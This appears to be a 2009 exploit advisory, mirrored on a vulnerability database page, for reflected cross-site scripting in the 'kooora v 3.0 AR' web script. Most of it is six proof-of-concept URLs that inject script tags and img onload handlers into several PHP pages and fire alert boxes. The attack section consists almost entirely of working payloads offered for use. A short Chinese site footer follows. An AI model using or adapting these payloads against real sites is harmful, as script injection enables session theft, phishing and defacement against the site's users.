======================================================================================== | # Title : kooora v 3.0 AR Cross Site Scripting Vulnerability | | # Author : indoushka | | # email : indoushka@hotmail.com | | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # EDB-ID : | | # CVE-ID : () | | # OSVDB-ID : () | | # DAte :16/12/2009 | | # Verified : | | # Web Site : www.iq-ty.com | | # Published: | | # Script : kooora v 3.0 AR | | # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu) | | # Bug : XSS | ====================== Exploit By indoushka ================================= | # Exploit : | | 1- http://127.0.0.1/koooraf/view.php?show_today=1</title><ScRiPt%20%0d%0a>alert(+00213771818860)%3B</ScRiPt> | 2- http://127.0.0.1/koooraf/view.php?show_year=1<img+src=http://127.0.0.1/jpg.jpg+onload=alert(+00213771818860)>&show_month=12 | 3- http://127.0.0.1/koooraf/view.php?team_s=1<img+src=http://127.0.0.1/jpg.jpg+onload=alert(+00213771818860)>&show_month=12 | 4- http://127.0.0.1/koooraf/twg3at.php/>'><ScRiPt>alert(213771818860)</ScRiPt> | 5- http://127.0.0.1/koooraf/view.php/>'><ScRiPt>alert(213771818860)</ScRiPt> | 6- http://127.0.0.1:80/koooraf/view_players.php/>'><ScRiPt>alert(213771818860)</ScRiPt> | ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | -------------------------------------------------------------------------------------------
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论